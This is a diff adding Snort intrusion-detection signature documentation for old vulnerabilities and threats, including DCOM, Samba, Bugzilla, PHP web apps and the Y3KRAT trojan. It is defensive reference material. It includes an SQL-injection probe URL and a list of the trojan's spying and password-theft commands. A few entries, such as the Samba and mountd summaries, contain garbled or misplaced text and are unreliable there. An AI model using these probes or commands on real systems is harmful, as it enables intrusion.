+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2055.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+2055
+
+--
+Summary:
+Versions of the software tracking system Bugzilla prior to 2.14.1 are 
+prone to a vulnerability that allows some degree of account hijacking.
+
+--
+Impact:
+False data may be represented in the bug tracking database.
+
+--
+Detailed Information:
+Versions of Bugzilla prior to 2.14.1 and cvs version 2.15 prior to 
+20020103 allow non-authorized users to post comments as any user of 
+their choosing, including non-valid usernames.
+
+A check to verify the user is valid when posting comments is not 
+performed correctly. Using this an attacker might post comments as 
+another user in the bugtraq database.
+
+--
+Affected Systems:
+Bugzilla versions prior to 2.14.1 and cvs versions prior to 2.15 (cvs20020103)
+
+--
+Attack Scenarios:
+The attacker can manually edit the page to pass his own version of 
+variables to the script handling the comments. This script in turn 
+passes the data directly to another script that handles the posting of 
+bugs without checking the user database.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade Bugzilla to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0008
+
+Bugzilla:
+http://www.bugzilla.org/security/2.14.1/
+http://bugzilla.mozilla.org/show_bug.cgi?id=108385
+http://bugzilla.mozilla.org/show_bug.cgi?id=108516
+
+--
--- /dev/null
+++ b/doc/signatures/2103.txt
@@ -0,0 +1,66 @@
+Rule:  
+
+--
+Sid: 2103
+
+--
+Summary:
+
+A buffer overflow exists in the Samba file and print sharing software 
+that can allow a remote attacker to gain root privileges on the target 
+script to exploit this vulnerability.
+
+--
+Impact:
+
+An attacker can cause the target system running Samba to overflow a 
+buffer presenting the attacker with root privileges.
+
+--
+Detailed Information:
+It is possible for an anonymous user to cause a buffer overflow in a 
+character array by sending data greater than 1024 bytes to the variable 
+pname. This information is copied by another function causing the buffer
+overflow.
+
+Affected Systems:
+Samba versions 2.2.5 to 2.2.8
+
+may indicate an attacker verifying the root shell.
+
+--
+Attack Scenarios:
+The attacker needs to send pname a value larger than 1024 bytes.
+
+--
+Ease of Attack:
+Simple, an exploit script exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+No false negatives are known at this time.
+
+--
+Corrective Action:
+Upgrade to Samba versions 2.2.8a or Samba-TNG.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Digital Defense
+http://www.digitaldefense.net/labs/advisories/DDI-1013.txt
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0201
+
+--
--- /dev/null
+++ b/doc/signatures/100000536.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000536
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "IMGallery" application running on a webserver. Access to 
+the file "galeria.php" with SQL commands being passed as the "sort" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "sort" parameter in the "galeria.php" script used by the 
+"IMGallery" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using IMGallery
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2359.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2359
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application Invision Board.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+Invision Board contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable root_path when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in the file conf_global.php.
+
+--
+Affected Systems:
+	Invision Power Services Invision Board 1.1.1
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the root_path variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3081.txt
@@ -0,0 +1,145 @@
+Rule: 
+
+--
+Sid: 
+3081
+-- 
+Summary: 
+This event is generated when a Y3KRAT 1.5 server attempts to respond to a client's connect request.
+
+-- 
+Impact: 
+If connected, the attacker could execute a multitude of functions resulting in a complete compromise of the victim's machine.
+
+--
+Detailed Information:
+Y3KRAT 1.5 uses port 5880 by default. This port can be changed by the attacker. 
+
+The following is a list of the commands for many of Y3KRAT 1.5's functions (Command Name: Command String):
+
+AIM Passwords: aolpwd
+AIM Spy: aolspy
+Change Internet Explorer Caption: changeiecaptest
+Chat With Server: chatsrvY3K Rat user
+Clipboard: pastefromclip
+Change Desktop Color Scheme: clsys
+Change Recycle Bin Name: nrbin
+Change System Name: sysname
+Change Time: time
+Video List: getvideolist
+Dialup: autoconnect
+Access Directories: getclientgetpaths
+Get Directory Paths: getpaths
+Disable Mouse Buttons: dbuttons
+Disable Num Lock: dnumlock
+Disable System Keys: dsyskeys
+Disable All Keys: dkeys{all}
+DOS Commands: doscommands
+Fast Mouse: fastmouseon
+Find File: findfile
+Flip Screen: flip1hor
+FTP: openftp21
+Go To URL: gotourl
+Hide Taskbar: hidetask
+Hide Clock: hideclock
+Hide Desktop Icons: hidedeskicons
+Hide Start Button: hidestart
+Hide System Tray: hidesystray
+ICQ Information: getclienticqinfo
+ICQ Passwords: geticqpass
+ICQ Spy: icqspy
+Internet Explorer Spy: iespy
+General Information: general
+Lights On: lightson
+Lights Off: lightsoff
+Live Shot: cap
+Logged Passwords: getpasses
+Logoff: boot41
+Make File: makefile
+Matrix Chat: matrix
+Modify File (Read System File): readsysfiles
+Modify File (Write System File): writesysfiles
+Monitor Off: enablestandby
+Mouse Settings (Set Position): setpos
+Mouse Settings (Freeze Mouse Position): freezepos
+Mouse Settings (Speed Up Cursor): speedcursor
+MSN Spy: msnspy
+Napster Spy: napsterspy
+Net Get: netget
+NetStat (Read): netstatread
+NetStat (Kill): netstatkill
+CD-ROM open: cdopen
+CD-ROM close: cdclose
+Open File: getfiles
+Overclock: upmhz
+Play Sound: snd (*followed by the sound, for example, err for the error sound*)
+Power Off: boot31
+Print: print
+Ras Passwords: getras
+Remove Server: killserver
+Change Resolution: setdevmode
+Restart: boot21
+Safe Mode: safemode
+Screenshot: cap
+Send Keys: sendtextf
+Send Message: messText
+Show Windows With Text: showwin
+Shutdown: boot11
+Swap Mouse Buttons: swapbuttons
+Write System Error: writesystem
+Yahoo Spy: yahoospy
+
+
+--
+Affected Systems:
+	Windows 95, 98, ME, NT, 2000
+
+--
+
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because they often can be backdoors in disguise.
+Once the victim mistakenly installs the server program, the attacker usually will employ an IP scanner program
+to find the IP addresses of victims that have installed the program. Then the attacker enters the IP address and 
+presses the connect button and he has access to your computer.
+
+-- 
+
+Ease of Attack: 
+Easy. Simply a matter of pressing the connect button once the victim has installed the server.
+
+
+-- 
+
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action: 
+Remove the Dcomcnofg key located at the following places in the registry:
+HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\CurrentVersion\Run 
+HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\CurrentVersion\RunServices
+HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run
+
+Reboot the computer or close Dcomcnofg.exe.
+
+Delete Dcomcnofg.exe from the windows system directory.
+
+If found, delete server.exe and kill the process called server.exe.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky Macatee <rmacatee@sourcefire.com> 
+
+-- 
+Additional References:
+
+Dark-E:
+http://www.dark-e.com/archive/trojans/y3krat/15/index.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/2323.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2323
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the QuickStore CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to the QuickStore CGI application running on a web server. This
+application does not perform stringent checks when validating the input
+from a user to the script. 
+
+The error document produced by the application may disclose sensitive
+information about the installation of the application.
+
+--
+Affected Systems:
+	QuickStore 2.12 and prior
+
+--
+Attack Scenarios:
+An attacker can supply input to the quickstore.cgi script using a single
+quote character in the "store" parameter. This will cause the script to
+generate an error and disclose the information described above.
+
+For example: http://vulnerable.com/cgi-bin/quickstore.cgi?store='
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2665.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2665
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+format string vulnerability against an IMAP server.
+
+--
+Impact:
+Serious. A successful format string attack could result in the
+execution of arbitrary code with the same privileges as the user running
+the IMAP daemon.
+
+--
+Detailed Information:
+Some versions of the Courier IMAP daemon are vulnerable to format string
+exploits prior to and during authentication to the IMAP server.  A
+successful exploit attempt could result in the remote attacker gaining
+unauthorized root access to a vulnerable system.
+
+--
+Affected Systems:
+	Courier IMAP server versions 1.6 though 3.0.2
+
+--
+Attack Scenarios:
+A remote attacker could use a publicly available script to exploit the 
+vulnerability an gain control of the target host.
+
+--
+
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2939.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2939
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/2777.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2777
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/508.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+508
+
+--
+Summary:
+This event is generated when a Gopher server is used as a proxy to connect to an FTP server.
+
+--
+Impact:
+This allows a user to assume the source IP of the Gopher server when connecting to an FTP server.
+
+--
+Detailed Information:
+A Gopher server may support proxy connections to FTP servers.  This allows a user to assume the source IP of the Gopher server when connecting to an FTP server.  This may be used to bypass FTP access restrictions based on source IP's.  
+
+--
+Affected Systems:
+Any Gopher server that supports proxy connections to FTP servers.
+
+--
+Attack Scenarios:
+A user who is normally restricted access to an FTP server based on the originating IP may attempt to circumvent this by attempting access from a Gopher server that supports proxy connections to FTP servers.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+This even will trigger if a Gopher server suuports proxy connections to FTP servers. 
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable the use of Gopher server.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats
+www.whitehats.com/info/IDS409
+
+--
--- /dev/null
+++ b/doc/signatures/412.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+412
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP IPV6 I-Am-Here datagram with an undefined ICMP code.
+
+--
+
+Impact:
+ICMP Type 34 datagrams are not expected network traffic.  Hosts generating ICMP Type 34 datagrams should be investigated for hostile activity.
+
+--
+
+Detailed Information:
+ICMP Type 34 is an undocumented extension to RFC 1812 and RFC 792.  Its current use it not defined by an approved RFC.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Hosts generating ICMP Type 34 datagrams should be investigated for hostile activity.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/409.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+409
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Echo Reply with an invalid or undefined ICMP Code.
+
+--
+
+Impact:
+Information-gathering.  An ICMP Echo Reply message is sent in response to an ICMP Echo Request message.  If the ICMP Echo Reply message reaches the requesting host it indicates that the replying host is alive.  Most OS's (operating systems) will accept an ICMP Echo Reply message with an invalid or undefined ICMP code set as a valid ICMP Echo Reply.
+
+--
+
+Detailed Information:
+ICMP Type 0 Code 0 is the RFC defined messaging type for ICMP Echo Reply datagrams.  This type of message is used to determine if a host is active on the network.
+
+--
+
+Attack Scenarios:
+Remote attackers my generate ICMP Echo Reply datagrams with invalid ICMP Codes in an attempt to cause faults in the applications or hosts generating ICMP Echo Requests.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Use ingress filtering to prevent ICMP Type 0 messages from entering the network.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2020.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2020
+
+--
+Summary:
+The RPC service mountd enables clients to connect to networked file 
+dismounted via TCP.
+
+--
+Impact:
+Denial of network resources to users on the local area network.
+
+--
+Detailed Information:
+This may be an attempt to deny access to network resources from an 
+unauthorized source. It may also be indicative of an attacker probing 
+for RPC services on a host in an attempt to discover a possible entry 
+point to network resources via a vulnerable daemon.
+
+--
+Affected Systems:
+All systems allowing network shares to be unmounted by anonymous hosts, 
+all systems allowing RPC services to be stopped by ordinary users and 
+systems already compromised by an attacker via another vulnerability.
+
+--
+Attack Scenarios:
+This is an intelligence gathering activity, the attacker could remotely 
+unmount a shared resource to deny a resource to the local area network 
+or a probe to discover possible routes of entry into a system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+When allowing hosts to mount an external network share, consider using a
+hosts.allow file.
+
+Do not allow shares to be unmounted by unauthorized hosts or users.
+
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+RPC services should also be disabled where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1413.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+1413
+
+--
+
+Summary:
+This event is generated when an SNMP connection over UDP using the 
+default 'private' community is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+SNMP (Simple Network Management Protocol) v1 uses communities and IP 
+addresses to authenticate communication between the SNMP client and SNMP
+daemon. Many SNMP implementations come pre-configured with 'public' and 
+'private' communities. If these are not disabled, the attacker can 
+gather a great deal of information about the device running the SNMP 
+daemon.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons with 'public' community enabled.
+
+--
+
+Attack Scenarios:
+An attacker scans a range of IPs for SNMP servers having the 'public' 
+community set and gathers information about the hosts.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable the 'public' and 'private' communities before connecting the 
+device with SNMP on the Internet or block access to SNMP ports using a 
+packet filtering firewall for unauthorized addresses.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0517
+
+--
--- /dev/null
+++ b/doc/signatures/1836.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1836
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "alt.binaries.pictures.erotica".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "alt.binaries.pictures.erotica".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000575.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000575
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_delete.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "cat_delete.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2527.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2527
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of the Private
+Communications Transport (PCT) protocol.
+
+--
+Impact:
+Execution of arbitrary code. Unauthorized administrative access to an
+affected host.
+
+--
+Detailed Information:
+A vulnerability exists in the handling of PCT requests that
+can be manipulated to give an attacker the opportunity to execute
+arbitrary code of their choosing leading to a possible remote
+administrative compromize of an affected host.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003 and XP systems using PCT
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted PCT request to an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the use of PCT
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3176.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3176
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1946.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1946
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000522.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000522
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "The Edge eCommerce Shop" application running on 
+a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "cart_id" parameter in the "productDetail.php" 
+script used by the "The Edge eCommerce Shop" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using The Edge eCommerce Shop
+--
+Attack Scenarios:
